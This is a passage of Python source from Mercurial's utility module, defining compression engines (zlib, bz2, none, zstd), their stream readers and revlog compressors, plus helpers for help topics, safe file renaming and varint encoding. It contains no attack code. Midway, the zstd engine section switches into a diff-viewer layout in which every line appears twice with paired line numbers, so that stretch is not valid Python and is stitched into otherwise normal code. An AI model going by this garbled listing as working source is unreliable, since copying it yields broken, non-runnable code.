            self._wiretypes[wiretype] = name

        revlogheader = engine.revlogheader()
        if revlogheader and revlogheader in self._revlogheaders:
            raise error.Abort(_('revlog header %s already registered by %s') %
                              (revlogheader, self._revlogheaders[revlogheader]))

        if revlogheader:
            self._revlogheaders[revlogheader] = name

        self._engines[name] = engine

    @property
    def supportedbundlenames(self):
        return set(self._bundlenames.keys())

    @property
    def supportedbundletypes(self):
        return set(self._bundletypes.keys())

    def forbundlename(self, bundlename):
        """Obtain a compression engine registered to a bundle name.

        Will raise KeyError if the bundle name isn't registered.

        Will abort if the engine is known but not available.
        """
        engine = self._engines[self._bundlenames[bundlename]]
        if not engine.available():
            raise error.Abort(_('compression engine %s could not be loaded') %
                              engine.name())
        return engine

    def forbundletype(self, bundletype):
        """Obtain a compression engine registered to a bundle type.

        Will raise KeyError if the bundle type isn't registered.

        Will abort if the engine is known but not available.
        """
        engine = self._engines[self._bundletypes[bundletype]]
        if not engine.available():
            raise error.Abort(_('compression engine %s could not be loaded') %
                              engine.name())
        return engine

    def supportedwireengines(self, role, onlyavailable=True):
        """Obtain compression engines that support the wire protocol.

        Returns a list of engines in prioritized order, most desired first.

        If ``onlyavailable`` is set, filter out engines that can't be
        loaded.
        """
        assert role in (SERVERROLE, CLIENTROLE)

        attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'

        engines = [self._engines[e] for e in self._wiretypes.values()]
        if onlyavailable:
            engines = [e for e in engines if e.available()]

        def getkey(e):
            # Sort first by priority, highest first. In case of tie, sort
            # alphabetically. This is arbitrary, but ensures output is
            # stable.
            w = e.wireprotosupport()
            return -1 * getattr(w, attr), w.name

        return list(sorted(engines, key=getkey))

    def forwiretype(self, wiretype):
        engine = self._engines[self._wiretypes[wiretype]]
        if not engine.available():
            raise error.Abort(_('compression engine %s could not be loaded') %
                              engine.name())
        return engine

    def forrevlogheader(self, header):
        """Obtain a compression engine registered to a revlog header.

        Will raise KeyError if the revlog header value isn't registered.
        """
        return self._engines[self._revlogheaders[header]]

compengines = compressormanager()

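# Illustrative lookups against the global manager (a sketch; results depend
# on which engines registered successfully in this install):
#
#     compengines['zlib']               # engine by name
#     compengines.forbundletype('GZ')   # engine by internal bundle identifier
#     compengines.supportedbundlenames  # e.g. {'gzip', 'bzip2', 'none', ...}
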
class compressionengine(object):
    """Base class for compression engines.

    Compression engines must implement the interface defined by this class.
    """
    def name(self):
        """Returns the name of the compression engine.

        This is the key the engine is registered under.

        This method must be implemented.
        """
        raise NotImplementedError()

    def available(self):
        """Whether the compression engine is available.

        The intent of this method is to allow optional compression engines
        that may not be available in all installations (such as engines relying
        on C extensions that may not be present).
        """
        return True

    def bundletype(self):
        """Describes bundle identifiers for this engine.

        If this compression engine isn't supported for bundles, returns None.

        If this engine can be used for bundles, returns a 2-tuple of strings of
        the user-facing "bundle spec" compression name and an internal
        identifier used to denote the compression format within bundles. To
        exclude the name from external usage, set the first element to ``None``.

        If bundle compression is supported, the class must also implement
        ``compressstream`` and ``decompressorreader``.

        The docstring of this method is used in the help system to tell users
        about this engine.
        """
        return None

    def wireprotosupport(self):
        """Declare support for this compression format on the wire protocol.

        If this compression engine isn't supported for compressing wire
        protocol payloads, returns None.

        Otherwise, returns ``compenginewireprotosupport`` with the following
        fields:

        * String format identifier
        * Integer priority for the server
        * Integer priority for the client

        The integer priorities are used to order the advertisement of format
        support by server and client. The highest integer is advertised
        first. Integers with non-positive values aren't advertised.

        The priority values are somewhat arbitrary and only used for default
        ordering. The relative order can be changed via config options.

        If wire protocol compression is supported, the class must also implement
        ``compressstream`` and ``decompressorreader``.
        """
        return None

    def revlogheader(self):
        """Header added to revlog chunks that identifies this engine.

        If this engine can be used to compress revlogs, this method should
        return the bytes used to identify chunks compressed with this engine.
        Else, the method should return ``None`` to indicate it does not
        participate in revlog compression.
        """
        return None

    def compressstream(self, it, opts=None):
        """Compress an iterator of chunks.

        The method receives an iterator (ideally a generator) of chunks of
        bytes to be compressed. It returns an iterator (ideally a generator)
        of chunks of bytes representing the compressed output.

        Optionally accepts an argument defining how to perform compression.
        Each engine treats this argument differently.
        """
        raise NotImplementedError()

    def decompressorreader(self, fh):
        """Perform decompression on a file object.

        Argument is an object with a ``read(size)`` method that returns
        compressed data. Return value is an object with a ``read(size)`` that
        returns uncompressed data.
        """
        raise NotImplementedError()

    def revlogcompressor(self, opts=None):
        """Obtain an object that can be used to compress revlog entries.

        The object has a ``compress(data)`` method that compresses binary
        data. This method returns compressed binary data or ``None`` if
        the data could not be compressed (too small, not compressible, etc).
        The returned data should have a header uniquely identifying this
        compression format so decompression can be routed to this engine.
        This header should be identified by the ``revlogheader()`` return
        value.

        The object has a ``decompress(data)`` method that decompresses
        data. The method will only be called if ``data`` begins with
        ``revlogheader()``. The method should return the raw, uncompressed
        data or raise a ``StorageError``.

        The object is reusable but is not thread safe.
        """
        raise NotImplementedError()

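# Illustrative sketch of a minimal custom engine (hypothetical names, not
# part of this module); an extension would subclass compressionengine and
# register an instance against the global manager:
#
#     class _identityengine(compressionengine):
#         def name(self):
#             return 'identity'
#         def compressstream(self, it, opts=None):
#             return it
#         def decompressorreader(self, fh):
#             return fh
#
#     compengines.register(_identityengine())
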
class _CompressedStreamReader(object):
    def __init__(self, fh):
        if safehasattr(fh, 'unbufferedread'):
            self._reader = fh.unbufferedread
        else:
            self._reader = fh.read
        # Decompressed chunks not yet returned to the caller; _pos is the
        # read offset into the first pending chunk.
        self._pending = []
        self._pos = 0
        self._eof = False

    def _decompress(self, chunk):
        raise NotImplementedError()

    def read(self, l):
        buf = []
        while True:
            while self._pending:
                if len(self._pending[0]) > l + self._pos:
                    newbuf = self._pending[0]
                    buf.append(newbuf[self._pos:self._pos + l])
                    self._pos += l
                    return ''.join(buf)

                newbuf = self._pending.pop(0)
                if self._pos:
                    buf.append(newbuf[self._pos:])
                    l -= len(newbuf) - self._pos
                else:
                    buf.append(newbuf)
                    l -= len(newbuf)
                self._pos = 0

            if self._eof:
                return ''.join(buf)
            chunk = self._reader(65536)
            self._decompress(chunk)
            if not chunk and not self._pending and not self._eof:
                # No progress and no new data, bail out
                return ''.join(buf)

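# Illustrative usage sketch (not from the original source): the concrete
# subclasses below are normally obtained through an engine, e.g.
#
#     reader = compengines['zlib'].decompressorreader(fh)
#     data = reader.read(4096)  # returns up to 4096 decompressed bytes
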
class _GzipCompressedStreamReader(_CompressedStreamReader):
    def __init__(self, fh):
        super(_GzipCompressedStreamReader, self).__init__(fh)
        self._decompobj = zlib.decompressobj()
    def _decompress(self, chunk):
        newbuf = self._decompobj.decompress(chunk)
        if newbuf:
            self._pending.append(newbuf)
        # Probe a copy of the decompressor with dummy input: once the
        # underlying stream has ended, extra input is reported back via
        # unused_data.
        d = self._decompobj.copy()
        try:
            d.decompress('x')
            d.flush()
            if d.unused_data == 'x':
                self._eof = True
        except zlib.error:
            pass

class _BZ2CompressedStreamReader(_CompressedStreamReader):
    def __init__(self, fh):
        super(_BZ2CompressedStreamReader, self).__init__(fh)
        self._decompobj = bz2.BZ2Decompressor()
    def _decompress(self, chunk):
        newbuf = self._decompobj.decompress(chunk)
        if newbuf:
            self._pending.append(newbuf)
        try:
            while True:
                newbuf = self._decompobj.decompress('')
                if newbuf:
                    self._pending.append(newbuf)
                else:
                    break
        except EOFError:
            self._eof = True

class _TruncatedBZ2CompressedStreamReader(_BZ2CompressedStreamReader):
    def __init__(self, fh):
        super(_TruncatedBZ2CompressedStreamReader, self).__init__(fh)
        newbuf = self._decompobj.decompress('BZ')
        if newbuf:
            self._pending.append(newbuf)

class _ZstdCompressedStreamReader(_CompressedStreamReader):
    def __init__(self, fh, zstd):
        super(_ZstdCompressedStreamReader, self).__init__(fh)
        self._zstd = zstd
        self._decompobj = zstd.ZstdDecompressor().decompressobj()
    def _decompress(self, chunk):
        newbuf = self._decompobj.decompress(chunk)
        if newbuf:
            self._pending.append(newbuf)
        try:
            while True:
                newbuf = self._decompobj.decompress('')
                if newbuf:
                    self._pending.append(newbuf)
                else:
                    break
        except self._zstd.ZstdError:
            self._eof = True

class _zlibengine(compressionengine):
    def name(self):
        return 'zlib'

    def bundletype(self):
        """zlib compression using the DEFLATE algorithm.

        All Mercurial clients should support this format. The compression
        algorithm strikes a reasonable balance between compression ratio
        and speed.
        """
        return 'gzip', 'GZ'

    def wireprotosupport(self):
        return compewireprotosupport('zlib', 20, 20)

    def revlogheader(self):
        return 'x'

    def compressstream(self, it, opts=None):
        opts = opts or {}

        z = zlib.compressobj(opts.get('level', -1))
        for chunk in it:
            data = z.compress(chunk)
            # Not all calls to compress emit data. It is cheaper to inspect
            # here than to feed empty chunks through the generator.
            if data:
                yield data

        yield z.flush()

    def decompressorreader(self, fh):
        return _GzipCompressedStreamReader(fh)

    class zlibrevlogcompressor(object):
        def compress(self, data):
            insize = len(data)
            # Caller handles empty input case.
            assert insize > 0

            if insize < 44:
                # Very small inputs are not worth trying to compress.
                return None

            elif insize <= 1000000:
                compressed = zlib.compress(data)
                if len(compressed) < insize:
                    return compressed
                return None

            # zlib makes an internal copy of the input buffer, doubling
            # memory usage for large inputs. So do streaming compression
            # on large inputs.
            else:
                z = zlib.compressobj()
                parts = []
                pos = 0
                while pos < insize:
                    pos2 = pos + 2**20
                    parts.append(z.compress(data[pos:pos2]))
                    pos = pos2
                parts.append(z.flush())

                if sum(map(len, parts)) < insize:
                    return ''.join(parts)
                return None

        def decompress(self, data):
            try:
                return zlib.decompress(data)
            except zlib.error as e:
                raise error.StorageError(_('revlog decompress error: %s') %
                                         stringutil.forcebytestr(e))

    def revlogcompressor(self, opts=None):
        return self.zlibrevlogcompressor()

compengines.register(_zlibengine())

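# Illustrative round trip through the zlib engine (a sketch, not from the
# original source; bytesio is the pycompat alias imported at the top of
# this module):
#
#     eng = compengines['zlib']
#     blob = b''.join(eng.compressstream(iter([b'some data'])))
#     reader = eng.decompressorreader(bytesio(blob))
#     assert reader.read(9) == b'some data'
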
class _bz2engine(compressionengine):
    def name(self):
        return 'bz2'

    def bundletype(self):
        """An algorithm that produces smaller bundles than ``gzip``.

        All Mercurial clients should support this format.

        This engine will likely produce smaller bundles than ``gzip`` but
        will be significantly slower, both during compression and
        decompression.

        If available, the ``zstd`` engine can yield similar or better
        compression at much higher speeds.
        """
        return 'bzip2', 'BZ'

    # We declare a protocol name but don't advertise by default because
    # it is slow.
    def wireprotosupport(self):
        return compewireprotosupport('bzip2', 0, 0)

    def compressstream(self, it, opts=None):
        opts = opts or {}
        z = bz2.BZ2Compressor(opts.get('level', 9))
        for chunk in it:
            data = z.compress(chunk)
            if data:
                yield data

        yield z.flush()

    def decompressorreader(self, fh):
        return _BZ2CompressedStreamReader(fh)

compengines.register(_bz2engine())

class _truncatedbz2engine(compressionengine):
    def name(self):
        return 'bz2truncated'

    def bundletype(self):
        return None, '_truncatedBZ'

    # We don't implement compressstream because it is hackily handled elsewhere.

    def decompressorreader(self, fh):
        return _TruncatedBZ2CompressedStreamReader(fh)

compengines.register(_truncatedbz2engine())

class _noopengine(compressionengine):
    def name(self):
        return 'none'

    def bundletype(self):
        """No compression is performed.

        Use this compression engine to explicitly disable compression.
        """
        return 'none', 'UN'

    # Clients always support uncompressed payloads. Servers don't because
    # unless you are on a fast network, uncompressed payloads can easily
    # saturate your network pipe.
    def wireprotosupport(self):
        return compewireprotosupport('none', 0, 10)

    # We don't implement revlogheader because it is handled specially
    # in the revlog class.

    def compressstream(self, it, opts=None):
        return it

    def decompressorreader(self, fh):
        return fh

    class nooprevlogcompressor(object):
        def compress(self, data):
            return None

    def revlogcompressor(self, opts=None):
        return self.nooprevlogcompressor()

compengines.register(_noopengine())

3752 class _zstdengine(compressionengine):
3758 class _zstdengine(compressionengine):
3753 def name(self):
3759 def name(self):
3754 return 'zstd'
3760 return 'zstd'
3755
3761
3756 @propertycache
3762 @propertycache
3757 def _module(self):
3763 def _module(self):
3758 # Not all installs have the zstd module available. So defer importing
3764 # Not all installs have the zstd module available. So defer importing
3759 # until first access.
3765 # until first access.
3760 try:
3766 try:
3761 from . import zstd
3767 from . import zstd
3762 # Force delayed import.
3768 # Force delayed import.
3763 zstd.__version__
3769 zstd.__version__
3764 return zstd
3770 return zstd
3765 except ImportError:
3771 except ImportError:
3766 return None
3772 return None
3767
3773
3768 def available(self):
3774 def available(self):
3769 return bool(self._module)
3775 return bool(self._module)
3770
3776
3771 def bundletype(self):
3777 def bundletype(self):
3772 """A modern compression algorithm that is fast and highly flexible.
3778 """A modern compression algorithm that is fast and highly flexible.
3773
3779
3774 Only supported by Mercurial 4.1 and newer clients.
3780 Only supported by Mercurial 4.1 and newer clients.
3775
3781
3776 With the default settings, zstd compression is both faster and yields
3782 With the default settings, zstd compression is both faster and yields
3777 better compression than ``gzip``. It also frequently yields better
3783 better compression than ``gzip``. It also frequently yields better
3778 compression than ``bzip2`` while operating at much higher speeds.
3784 compression than ``bzip2`` while operating at much higher speeds.
3779
3785
3780 If this engine is available and backwards compatibility is not a
3786 If this engine is available and backwards compatibility is not a
3781 concern, it is likely the best available engine.
3787 concern, it is likely the best available engine.
3782 """
3788 """
3783 return 'zstd', 'ZS'
3789 return 'zstd', 'ZS'
3784
3790
3785 def wireprotosupport(self):
3791 def wireprotosupport(self):
3786 return compewireprotosupport('zstd', 50, 50)
3792 return compewireprotosupport('zstd', 50, 50)
3787
3793
3788 def revlogheader(self):
3794 def revlogheader(self):
3789 return '\x28'
3795 return '\x28'
3790
3796
3791 def compressstream(self, it, opts=None):
3797 def compressstream(self, it, opts=None):
3792 opts = opts or {}
3798 opts = opts or {}
3793 # zstd level 3 is almost always significantly faster than zlib
3799 # zstd level 3 is almost always significantly faster than zlib
3794 # while providing no worse compression. It strikes a good balance
3800 # while providing no worse compression. It strikes a good balance
3795 # between speed and compression.
3801 # between speed and compression.
3796 level = opts.get('level', 3)
3802 level = opts.get('level', 3)
3797
3803
3798 zstd = self._module
3804 zstd = self._module
3799 z = zstd.ZstdCompressor(level=level).compressobj()
3805 z = zstd.ZstdCompressor(level=level).compressobj()
3800 for chunk in it:
3806 for chunk in it:
3801 data = z.compress(chunk)
3807 data = z.compress(chunk)
3802 if data:
3808 if data:
3803 yield data
3809 yield data
3804
3810
3805 yield z.flush()
3811 yield z.flush()
3806
3812
3807 def decompressorreader(self, fh):
3813 def decompressorreader(self, fh):
3808 return _ZstdCompressedStreamReader(fh, self._module)
3814 return _ZstdCompressedStreamReader(fh, self._module)
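
    # Illustrative sketch (not part of the original module): stream
    # compression through the zstd engine, guarded on availability since the
    # bundled zstd module may be missing. The method name
    # ``_streamexample`` is hypothetical.
    def _streamexample(self):
        if not self.available():
            return None
        # A higher ``level`` trades speed for ratio; 3 is the default used
        # by compressstream() above.
        chunks = self.compressstream(iter([b'data' * 1000]), {'level': 3})
        return b''.join(chunks)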

    class zstdrevlogcompressor(object):
        def __init__(self, zstd, level=3):
            # TODO consider omitting frame magic to save 4 bytes.
            # This writes content sizes into the frame header. That is
            # extra storage. But it allows a correct size memory allocation
            # to hold the result.
            self._cctx = zstd.ZstdCompressor(level=level)
            self._dctx = zstd.ZstdDecompressor()
            self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
            self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE

        def compress(self, data):
            insize = len(data)
            # Caller handles empty input case.
            assert insize > 0

            if insize < 50:
                # Inputs this small are unlikely to shrink below their
                # original size; don't bother trying.
                return None

            elif insize <= 1000000:
                # Small enough to compress in a single call.
                compressed = self._cctx.compress(data)
                if len(compressed) < insize:
                    return compressed
                return None
            else:
                # Compress large inputs in a streaming fashion to bound
                # memory usage.
                z = self._cctx.compressobj()
                chunks = []
                pos = 0
                while pos < insize:
                    pos2 = pos + self._compinsize
                    chunk = z.compress(data[pos:pos2])
                    if chunk:
                        chunks.append(chunk)
                    pos = pos2
                chunks.append(z.flush())

                if sum(map(len, chunks)) < insize:
                    return ''.join(chunks)
                return None

        def decompress(self, data):
            insize = len(data)

            try:
                # This was measured to be faster than other streaming
                # decompressors.
                dobj = self._dctx.decompressobj()
                chunks = []
                pos = 0
                while pos < insize:
                    pos2 = pos + self._decompinsize
                    chunk = dobj.decompress(data[pos:pos2])
                    if chunk:
                        chunks.append(chunk)
                    pos = pos2
                # Frame should be exhausted, so no finish() API.

                return ''.join(chunks)
            except Exception as e:
                raise error.StorageError(_('revlog decompress error: %s') %
                                         stringutil.forcebytestr(e))

    def revlogcompressor(self, opts=None):
        opts = opts or {}
        return self.zstdrevlogcompressor(self._module,
                                         level=opts.get('level', 3))

compengines.register(_zstdengine())
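
# Illustrative sketch (not part of the original module): a revlog compressor
# round-trip. compress() returns None when compression is not worthwhile,
# so callers must keep the original data for that case. The helper name
# ``_zstdrevlogexample`` and the sample payload are hypothetical.
def _zstdrevlogexample():
    engine = compengines['zstd']
    if not engine.available():
        return
    c = engine.revlogcompressor()
    data = b'revlog chunk ' * 100
    compressed = c.compress(data)
    # Highly repetitive input should compress; verify the round-trip.
    if compressed is not None:
        assert c.decompress(compressed) == data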

def bundlecompressiontopics():
    """Obtains a list of available bundle compressions for use in help."""
    # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
    items = {}

    # We need to format the docstring. So use a dummy object/type to hold it
    # rather than mutating the original.
    class docobject(object):
        pass

    for name in compengines:
        engine = compengines[name]

        if not engine.available():
            continue

        bt = engine.bundletype()
        if not bt or not bt[0]:
            continue

        doc = b'``%s``\n    %s' % (bt[0], pycompat.getdoc(engine.bundletype))

        value = docobject()
        value.__doc__ = pycompat.sysstr(doc)
        value._origdoc = engine.bundletype.__doc__
        value._origfunc = engine.bundletype

        items[bt[0]] = value

    return items
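
# Illustrative sketch (not part of the original module): the mapping built
# above keys help entries by bundle type name, e.g. (hypothetical session):
#
#   topics = bundlecompressiontopics()
#   'none' in topics          # True; the noop engine is always available
#   topics['none'].__doc__    # formatted help text for that engine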

i18nfunctions = bundlecompressiontopics().values()

# Convenient shortcut for the debugstacktrace() debugging helper.
dst = debugstacktrace

def safename(f, tag, ctx, others=None):
    """
    Generate a name that is safe to rename f to in the given context.

    f: filename to rename
    tag: a string tag that will be included in the new name
    ctx: a context, in which the new name must not exist
    others: a set of other filenames that the new name must not be in

    Returns a file name of the form oldname~tag[~number] which does not exist
    in the provided context and is not in the set of other names.
    """
    if others is None:
        others = set()

    fn = '%s~%s' % (f, tag)
    if fn not in ctx and fn not in others:
        return fn
    for n in itertools.count(1):
        fn = '%s~%s~%s' % (f, tag, n)
        if fn not in ctx and fn not in others:
            return fn
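
# Illustrative sketch (not part of the original module): ``ctx`` only needs
# membership testing, so a plain set stands in for a changectx here. The
# helper name and file names are hypothetical.
def _safenameexample():
    existing = {'a.txt', 'a.txt~base'}
    # 'a.txt~base' is taken, so the counter kicks in at ~1.
    assert safename('a.txt', 'base', existing) == 'a.txt~base~1'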

def readexactly(stream, n):
    '''read n bytes from stream.read and abort if fewer were available'''
    s = stream.read(n)
    if len(s) < n:
        raise error.Abort(_("stream ended unexpectedly"
                            " (got %d bytes, expected %d)")
                          % (len(s), n))
    return s
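
# Illustrative sketch (not part of the original module): readexactly()
# either returns exactly ``n`` bytes or raises Abort, so callers never need
# to check for short reads. ``bytesio`` is the module-level alias defined
# above; the helper name is hypothetical.
def _readexactlyexample():
    assert readexactly(bytesio(b'abcdef'), 4) == b'abcd'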

def uvarintencode(value):
    """Encode an unsigned integer value to a varint.

    A varint is a variable length integer of 1 or more bytes. Each byte
    except the last has the most significant bit set. The lower 7 bits of
    each byte store the integer's binary representation, least significant
    group first.

    >>> uvarintencode(0)
    '\\x00'
    >>> uvarintencode(1)
    '\\x01'
    >>> uvarintencode(127)
    '\\x7f'
    >>> uvarintencode(1337)
    '\\xb9\\n'
    >>> uvarintencode(65536)
    '\\x80\\x80\\x04'
    >>> uvarintencode(-1)
    Traceback (most recent call last):
        ...
    ProgrammingError: negative value for uvarint: -1
    """
    if value < 0:
        raise error.ProgrammingError('negative value for uvarint: %d'
                                     % value)
    bits = value & 0x7f
    value >>= 7
    bytes = []
    while value:
        bytes.append(pycompat.bytechr(0x80 | bits))
        bits = value & 0x7f
        value >>= 7
    bytes.append(pycompat.bytechr(bits))

    return ''.join(bytes)
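
# Illustrative worked example (not part of the original module): the
# arithmetic for 1337 step by step. 1337 = 0b10100111001; the low 7 bits
# (0b0111001 = 0x39) go out first with the continuation bit set
# (0x80 | 0x39 = 0xb9), then the remaining bits (1337 >> 7 = 10 = 0x0a,
# i.e. b'\n') form the final byte, giving b'\xb9\n' as in the doctest above.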

def uvarintdecodestream(fh):
    """Decode an unsigned variable length integer from a stream.

    The passed argument is anything that has a ``.read(N)`` method.

    >>> try:
    ...     from StringIO import StringIO as BytesIO
    ... except ImportError:
    ...     from io import BytesIO
    >>> uvarintdecodestream(BytesIO(b'\\x00'))
    0
    >>> uvarintdecodestream(BytesIO(b'\\x01'))
    1
    >>> uvarintdecodestream(BytesIO(b'\\x7f'))
    127
    >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
    1337
    >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
    65536
    >>> uvarintdecodestream(BytesIO(b'\\x80'))
    Traceback (most recent call last):
        ...
    Abort: stream ended unexpectedly (got 0 bytes, expected 1)
    """
    result = 0
    shift = 0
    while True:
        byte = ord(readexactly(fh, 1))
        result |= ((byte & 0x7f) << shift)
        if not (byte & 0x80):
            return result
        shift += 7
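
# Illustrative sketch (not part of the original module): an encode/decode
# round-trip through the two helpers above, using the module-level
# ``bytesio`` alias. The helper name is hypothetical.
def _uvarintroundtrip(value=1337):
    return uvarintdecodestream(bytesio(uvarintencode(value))) == value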